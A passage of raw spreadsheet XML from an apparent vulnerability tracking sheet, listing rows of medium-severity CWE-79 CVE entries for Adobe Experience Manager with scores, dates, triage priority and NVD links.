t="n"><v>5.4</v></c><c r="E1420" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1420" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1420" s="5" t="inlineStr" /><c r="H1420" s="5" t="n"><v>0.003</v></c><c r="I1420" s="5" t="inlineStr" /><c r="J1420" s="5" t="inlineStr" /><c r="K1420" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1420" s="5" t="inlineStr" /><c r="M1420" s="5" t="inlineStr" /><c r="N1420" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1420" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1420" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1420" s="5" t="inlineStr" /><c r="R1420" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75711</t></is></c></row><row r="1421"><c r="A1421" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1421" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1421" s="5" t="inlineStr"><is><t>CVE-2026-75712</t></is></c><c r="D1421" s="5" t="n"><v>5.4</v></c><c r="E1421" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1421" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1421" s="5" t="inlineStr" /><c r="H1421" s="5" t="n"><v>0.003</v></c><c r="I1421" s="5" t="inlineStr" /><c r="J1421" s="5" t="inlineStr" /><c r="K1421" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1421" s="5" t="inlineStr" /><c r="M1421" s="5" t="inlineStr" /><c r="N1421" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1421" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1421" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1421" s="5" t="inlineStr" /><c r="R1421" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75712</t></is></c></row><row r="1422"><c r="A1422" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1422" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1422" s="5" t="inlineStr"><is><t>CVE-2026-75713</t></is></c><c r="D1422" s="5" t="n"><v>5.4</v></c><c r="E1422" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1422" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1422" s="5" t="inlineStr" /><c r="H1422" s="5" t="n"><v>0.003</v></c><c r="I1422" s="5" t="inlineStr" /><c r="J1422" s="5" t="inlineStr" /><c r="K1422" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1422" s="5" t="inlineStr" /><c r="M1422" s="5" t="inlineStr" /><c r="N1422" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1422" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1422" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1422" s="5" t="inlineStr" /><c r="R1422" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75713</t></is></c></row><row r="1423"><c r="A1423" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1423" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1423" s="5" t="inlineStr"><is><t>CVE-2026-75714</t></is></c><c r="D1423" s="5" t="n"><v>5.4</v></c><c r="E1423" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1423" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1423" s="5" t="inlineStr" /><c r="H1423" s="5" t="n"><v>0.003</v></c><c r="I1423" s="5" t="inlineStr" /><c r="J1423" s="5" t="inlineStr" /><c r="K1423" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1423" s="5" t="inlineStr" /><c r="M1423" s="5" t="inlineStr" /><c r="N1423" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1423" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1423" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1423" s="5" t="inlineStr" /><c r="R1423" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75714</t></is></c></row><row r="1424"><c r="A1424" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1424" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1424" s="5" t="inlineStr"><is><t>CVE-2026-75715</t></is></c><c r="D1424" s="5" t="n"><v>5.4</v></c><c r="E1424" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1424" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1424" s="5" t="inlineStr" /><c r="H1424" s="5" t="n"><v>0.003</v></c><c r="I1424" s="5" t="inlineStr" /><c r="J1424" s="5" t="inlineStr" /><c r="K1424" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1424" s="5" t="inlineStr" /><c r="M1424" s="5" t="inlineStr" /><c r="N1424" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1424" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1424" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1424" s="5" t="inlineStr" /><c r="R1424" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75715</t></is></c></row><row r="1425"><c r="A1425" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1425" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1425" s="5" t="inlineStr"><is><t>CVE-2026-75716</t></is></c><c r="D1425" s="5" t="n"><v>5.4</v></c><c r="E1425" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1425" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1425" s="5" t="inlineStr" /><c r="H1425" s="5" t="n"><v>0.003</v></c><c r="I1425" s="5" t="inlineStr" /><c r="J1425" s="5" t="inlineStr" /><c r="K1425" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1425" s="5" t="inlineStr" /><c r="M1425" s="5" t="inlineStr" /><c r="N1425" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1425" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1425" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1425" s="5" t="inlineStr" /><c r="R1425" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75716</t></is></c></row><row r="1426"><c r="A1426" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1426" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1426" s="5" t="inlineStr"><is><t>CVE-2026-75717</t></is></c><c r="D1426" s="5" t="n"><v>5.4</v></c><c r="E1426" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1426" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1426" s="5" t="inlineStr" /><c r="H1426" s="5" t="n"><v>0.003</v></c><c r="I1426" s="5" t="inlineStr" /><c r="J1426" s="5" t="inlineStr" /><c r="K1426" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1426" s="5" t="inlineStr" /><c r="M1426" s="5" t="inlineStr" /><c r="N1426" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1426" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1426" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1426" s="5" t="inlineStr" /><c r="R1426" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75717</t></is></c></row><row r="1427"><c r="A1427" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1427" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1427" s="5" t="inlineStr"><is><t>CVE-2026-75718</t></is></c><c r="D1427" s="5" t="n"><v>5.4</v></c><c r="E1427" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1427" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1427" s="5" t="inlineStr" /><c r="H1427" s="5" t="n"><v>0.003</v></c><c r="I1427" s="5" t="inlineStr" /><c r="J1427" s="5" t="inlineStr" /><c r="K1427" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1427" s="5" t="inlineStr" /><c r="M1427" s="5" t="inlineStr" /><c r="N1427" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1427" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1427" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1427" s="5" t="inlineStr" /><c r="R1427" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75718</t></is></c></row><row r="1428"><c r="A1428" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1428" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1428" s="5" t="inlineStr"><is><t>CVE-2026-75719</t></is></c><c r="D1428" s="5" t="n"><v>5.4</v></c><c r="E1428" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1428" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1428" s="5" t="inlineStr" /><c r="H1428" s="5" t="n"><v>0.003</v></c><c r="I1428" s="5" t="inlineStr" /><c r="J1428" s="5" t="inlineStr" /><c r="K1428" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1428" s="5" t="inlineStr" /><c r="M1428" s="5" t="inlineStr" /><c r="N1428" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1428" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1428" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1428" s="5" t="inlineStr" /><c r="R1428" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75719</t></is></c></row><row r="1429"><c r="A1429" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1429" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1429" s="5" t="inlineStr"><is><t>CVE-2026-75720</t></is></c><c r="D1429" s="5" t="n"><v>5.4</v></c><c r="E1429" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1429" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1429" s="5" t="inlineStr" /><c r="H1429" s="5" t="n"><v>0.003</v></c><c r="I1429" s="5" t="inlineStr" /><c r="J1429" s="5" t="inlineStr" /><c r="K1429" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1429" s="5" t="inlineStr" /><c r="M1429" s="5" t="inlineStr" /><c r="N1429" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1429" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1429" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1429" s="5" t="inlineStr" /><c r="R1429" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75720</t></is></c></row><row r="1430"><c r="A1430" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1430" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1430" s="5" t="inlineStr"><is><t>CVE-2026-75722</t></is></c><c r="D1430" s="5" t="n"><v>5.4</v></c><c r="E1430" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1430" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1430" s="5" t="inlineStr" /><c r="H1430" s="5" t="n"><v>0.003</v></c><c r="I1430" s="5" t="inlineStr" /><c r="J1430" s="5" t="inlineStr" /><c r="K1430" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1430" s="5" t="inlineStr" /><c r="M1430" s="5" t="inlineStr" /><c r="N1430" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1430" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1430" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1430" s="5" t="inlineStr" /><c r="R1430" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75722</t></is></c></row><row r="1431"><c r="A1431" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1431" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1431" s="5" t="inlineStr"><is><t>CVE-2026-75724</t></is></c><c r="D1431" s="5" t="n"><v>5.4</v></c><c r="E1431" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1431" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1431" s="5" t="inlineStr" /><c r="H1431" s="5" t="n"><v>0.003</v></c><c r="I1431" s="5" t="inlineStr" /><c r="J1431" s="5" t="inlineStr" /><c r="K1431" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1431" s="5" t="inlineStr" /><c r="M1431" s="5" t="inlineStr" /><c r="N1431" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1431" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1431" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1431" s="5" t="inlineStr" /><c r="R1431" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75724</t></is></c></row><row r="1432"><c r="A1432" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1432" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1432" s="5" t="inlineStr"><is><t>CVE-2026-75725</t></is></c><c r="D1432" s="5" t="n"><v>5.4</v></c><c r="E1432" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1432" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1432" s="5" t="inlineStr" /><c r="H1432" s="5" t="n"><v>0.003</v></c><c r="I1432" s="5" t="inlineStr" /><c r="J1432" s="5" t="inlineStr" /><c r="K1432" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1432" s="5" t="inlineStr" /><c r="M1432" s="5" t="inlineStr" /><c r="N1432" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1432" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1432" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1432" s="5" t="inlineStr" /><c r="R1432" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75725</t></is></c></row><row r="1433"><c r="A1433" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1433" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1433" s="5" t="inlineStr"><is><t>CVE-2026-75727</t></is></c><c r="D1433" s="5" t="n"><v>5.4</v></c><c r="E1433" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1433" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1433" s="5" t="inlineStr" /><c r="H1433" s="5" t="n"><v>0.003</v></c><c r="I1433" s="5" t="inlineStr" /><c r="J1433" s="5" t="inlineStr" /><c r="K1433" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1433" s="5" t="inlineStr" /><c r="M1433" s="5" t="inlineStr" /><c r="N1433" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1433" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1433" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1433" s="5" t="inlineStr" /><c r="R1433" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75727</t></is></c></row><row r="1434"><c r="A1434" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1434" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1434" s="5" t="inlineStr"><is><t>CVE-2026-75729</t></is></c><c r="D1434" s="5" t="n"><v>5.4</v></c><c r="E1434" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1434" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1434" s="5" t="inlineStr" /><c r="H1434" s="5" t="n"><v>0.003</v></c><c r="I1434" s="5" t="inlineStr" /><c r="J1434" s="5" t="inlineStr" /><c r="K1434" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1434" s="5" t="inlineStr" /><c r="M1434" s="5" t="inlineStr" /><c r="N1434" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1434" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1434" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1434" s="5" t="inlineStr" /><c r="R1434" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75729</t></is></c></row><row r="1435"><c r="A1435" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1435" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1435" s="5" t="inlineStr"><is><t>CVE-2026-75730</t></is></c><c r="D1435" s="5" t="n"><v>5.4</v></c><c r="E1435" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1435" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1435" s="5" t="inlineStr" /><c r="H1435" s="5" t="n"><v>0.003</v></c><c r="I1435" s="5" t="inlineStr" /><c r="J1435" s="5" t="inlineStr" /><c r="K1435" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1435" s="5" t="inlineStr" /><c r="M1435" s="5" t="inlineStr" /><c r="N1435" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1435" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1435" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1435" s="5" t="inlineStr" /><c r="R1435" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75730</t></is></c></row><row r="1436"><c r="A1436" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1436" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1436" s="5" t="inlineStr"><is><t>CVE-2026-75731</t></is></c><c r="D1436" s="5" t="n"><v>5.4</v></c><c r="E1436" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1436" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1436" s="5" t="inlineStr" /><c r="H1436" s="5" t="n"><v>0.003</v></c><c r="I1436" s="5" t="inlineStr" /><c r="J1436" s="5" t="inlineStr" /><c r="K1436" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1436" s="5" t="inlineStr" /><c r="M1436" s="5" t="inlineStr" /><c r="N1436" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1436" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1436" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1436" s="5" t="inlineStr" /><c r="R1436" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75731</t></is></c></row><row r="1437"><c r="A1437" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1437" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1437" s="5" t="inlineStr"><is><t>CVE-2026-75733</t></is></c><c r="D1437" s="5" t="n"><v>5.4</v></c><c r="E1437" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1437" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1437" s="5" t="inlineStr" /><c r="H1437" s="5" t="n"><v>0.003</v></c><c r="I1437" s="5" t="inlineStr" /><c r="J1437" s="5" t="inlineStr" /><c r="K1437" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1437" s="5" t="inlineStr" /><c r="M1437" s="5" t="inlineStr" /><c r="N1437" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1437" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1437" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1437" s="5" t="inlineStr" /><c r="R1437" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75733</t></is></c></row><row r="1438"><c r="A1438" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1438" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1438" s="5" t="inlineStr"><is><t>CVE-2026-75734</t></is></c><c r="D1438" s="5" t="n"><v>5.4</v></c><c r="E1438" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1438" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1438" s="5" t="inlineStr" /><c r="H1438" s="5" t="n"><v>0.003</v></c><c r="I1438" s="5" t="inlineStr" /><c r="J1438" s="5" t="inlineStr" /><c r="K1438" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1438" s="5" t="inlineStr" /><c r="M1438" s="5" t="inlineStr" /><c r="N1438" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1438" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1438" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1438" s="5" t="inlineStr" /><c r="R1438" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75734</t></is></c></row><row r="1439"><c r="A1439" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1439" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1439" s="5" t="inlineStr"><is><t>CVE-2026-75735</t></is></c><c r="D1439" s="5" t="n"><v>5.4</v></c><c r="E1439" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1439" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1439" s="5" t="inlineStr" /><c r="H1439" s="5" t="n"><v>0.003</v></c><c r="I1439" s="5" t="inlineStr" /><c r="J1439" s="5" t="inlineStr" /><c r="K1439" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1439" s="5" t="inlineStr" /><c r="M1439" s="5" t="inlineStr" /><c r="N1439" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1439" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1439" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1439" s="5" t="inlineStr" /><c r="R1439" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75735</t></is></c></row><row r="1440"><c r="A1440" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1440" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1440" s="5" t="inlineStr"><is><t>CVE-2026-75736</t></is></c><c r="D1440" s="5" t="n"><v>5.4</v></c><c r="E1440" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1440" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1440" s="5" t="inlineStr" /><c r="H1440" s="5" t="n"><v>0.003</v></c><c r="I1440" s="5" t="inlineStr" /><c r="J1440" s="5" t="inlineStr" /><c r="K1440" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1440" s="5" t="inlineStr" /><c r="M1440" s="5" t="inlineStr" /><c r="N1440" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1440" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1440" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1440" s="5" t="inlineStr" /><c r="R1440" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S144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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75736</t></is></c></row><row r="1441"><c r="A1441" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1441" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1441" s="5" t="inlineStr"><is><t>CVE-2026-75737</t></is></c><c r="D1441" s="5" t="n"><v>5.4</v></c><c r="E1441" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1441" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1441" s="5" t="inlineStr" /><c r="H1441" s="5" t="n"><v>0.003</v></c><c r="I1441" s="5" t="inlineStr" /><c r="J1441" s="5" t="inlineStr" /><c r="K1441" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1441" s="5" t="inlineStr" /><c r="M1441" s="5" t="inlineStr" /><c r="N1441" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1441" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1441" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1441" s="5" t="inlineStr" /><c r="R1441" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S144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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75737</t></is></c></row><row r="1442"><c r="A1442" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1442" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1442" s="5" t="inlineStr"><is><t>CVE-2026-75738</t></is></c><c r="D1442" s="5" t="n"><v>5.4</v></c><c r="E1442" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1442" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1442" s="5" t="inlineStr" /><c r="H1442" s="5" t="n"><v>0.003</v></c><c r="I1442" s="5" t="inlineStr" /><c r="J1442" s="5" t="inlineStr" /><c r="K1442" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1442" s="5" t="inlineStr" /><c r="M1442" s="5" t="inlineStr" /><c r="N1442" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1442" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1442" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1442" s="5" t="inlineStr" /><c r="R1442" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S144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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75738</t></is></c></row><row r="1443"><c r="A1443" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1443" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1443" s="5" t="inlineStr"><is><t>CVE-2026-75739</t></is></c><c r="D1443" s="5" t="n"><v>5.4</v></c><c r="E1443" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1443" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1443" s="5" t="inlineStr" /><c r="H1443" s="5" t="n"><v>0.003</v></c><c r="I1443" s="5" t="inlineStr" /><c r="J1443" s="5" t="inlineStr" /><c r="K1443" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1443" s="5" t="inlineStr" /><c r="M1443" s="5" t="inlineStr" /><c r="N1443" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1443" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1443" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1443" s="5" t="inlineStr" /><c r="R1443" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S144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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75739</t></is></c></row><row r="1444"><c r="A1444" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1444" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1444" s="5" t="inlineStr"><is><t>CVE-2026-75740</t></is></c><c r="D1444" s="5" t="n"><v>5.4</v></c><c r="E1444" s="5" 